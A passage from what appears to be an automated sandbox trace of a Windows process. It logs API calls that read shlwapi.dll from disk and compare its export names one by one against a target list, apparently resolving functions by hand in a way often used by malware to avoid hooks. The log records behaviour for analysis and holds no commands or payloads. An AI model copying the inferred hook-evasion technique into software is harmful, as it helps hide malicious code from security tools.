lpString2="I_NetLogonUasLogon") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0156.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0156.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0156.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0156.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0156.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0156.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0156.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0156.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0156.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0156.335] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0156.335] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0156.335] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0156.335] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0156.335] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0156.335] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0156.335] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0156.335] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0156.335] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0156.338] GetProcessHeap () returned 0x4d0000 [0156.338] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2c45030 | out: hHeap=0x4d0000) returned 1 [0156.338] GetProcessHeap () returned 0x4d0000 [0156.338] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x10) returned 0x4e90f0 [0156.338] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0156.339] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0156.339] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0156.339] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0156.339] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0156.339] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0156.339] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0156.339] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0156.339] GetProcessHeap () returned 0x4d0000 [0156.339] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x51148) returned 0x2c45030 [0156.340] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0156.340] ReadFile (in: hFile=0x17c, lpBuffer=0x2c45030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c45030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0156.343] CloseHandle (hObject=0x17c) returned 1 [0156.343] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0156.343] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0156.343] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0156.343] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0156.343] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0156.343] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0156.343] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0156.343] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0156.343] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0156.343] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0156.343] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0156.343] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0156.343] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0156.343] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0156.343] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0156.343] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0156.343] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0156.343] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0156.343] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0156.343] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0156.343] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0156.344] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0156.344] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0156.344] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0156.344] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0156.344] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0156.344] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0156.344] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0156.344] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0156.344] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0156.344] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0156.344] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0156.344] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0156.344] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0156.344] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0156.344] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0156.344] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0156.344] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0156.344] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0156.344] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0156.344] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0156.344] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0156.344] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0156.344] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0156.344] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0156.344] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0156.344] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0156.344] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0156.344] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0156.344] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0156.344] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0156.344] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0156.344] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0156.344] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0156.345] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0156.345] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0156.345] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0156.345] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0156.345] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0156.345] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0156.345] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0156.345] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0156.345] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0156.345] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0156.345] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0156.345] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0156.345] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0156.345] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0156.345] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0156.345] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0156.345] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0156.345] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0156.345] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0156.345] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0156.345] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0156.345] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0156.345] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0156.345] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0156.346] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0156.346] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0156.346] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0156.346] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0156.346] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0156.346] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0156.346] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0156.346] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0156.346] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0156.346] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0156.346] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0156.346] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0156.346] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0156.346] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0156.346] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0156.346] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0156.346] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0156.346] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0156.346] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0156.346] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0156.346] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0156.346] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0156.346] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0156.346] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0156.346] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0156.346] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0156.346] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0156.346] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0156.346] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0156.346] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0156.346] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0156.347] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0156.347] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0156.347] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0156.347] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0156.347] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0156.347] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0156.347] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0156.347] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0156.347] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0156.347] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0156.347] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0156.347] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0156.347] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0156.347] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0156.347] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0156.347] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0156.347] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0156.347] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0156.347] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0156.347] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0156.347] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0156.347] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0156.347] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0156.347] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0156.347] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0156.347] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0156.347] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0156.347] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0156.347] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0156.348] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0156.348] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0156.348] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0156.348] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0156.348] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0156.348] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0156.348] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0156.348] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0156.348] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0156.348] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0156.348] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0156.348] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0156.348] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0156.348] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0156.348] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0156.348] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0156.348] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0156.348] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0156.348] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0156.348] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0156.348] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0156.348] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0156.348] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0156.348] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0156.348] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0156.348] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0156.348] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0156.348] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0156.348] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0156.348] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0156.348] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0156.348] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0156.348] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0156.349] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0156.349] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0156.349] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0156.349] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0156.349] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0156.349] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0156.349] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0156.349] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0156.349] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0156.349] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0156.349] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0156.349] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0156.349] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0156.349] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0156.349] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0156.349] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0156.349] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0156.349] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0156.349] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0156.349] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0156.349] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0156.349] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0156.349] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0156.349] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0156.349] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0156.349] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0156.349] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0156.349] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0156.349] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0156.349] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0156.350] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0156.350] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0156.423] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0156.423] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0156.423] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0156.423] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0156.423] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0156.423] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0156.423] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0156.423] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0156.423] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0156.423] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0156.423] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0156.423] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0156.423] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0156.423] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0156.423] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0156.423] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0156.423] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0156.423] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0156.423] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0156.423] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0156.423] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0156.424] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0156.424] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0156.424] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0156.424] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0156.424] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0156.424] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0156.424] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0156.424] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0156.424] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0156.424] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0156.424] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0156.424] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0156.424] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0156.424] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0156.424] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0156.424] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0156.424] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0156.424] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0156.424] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0156.424] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0156.425] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0156.425] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0156.425] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 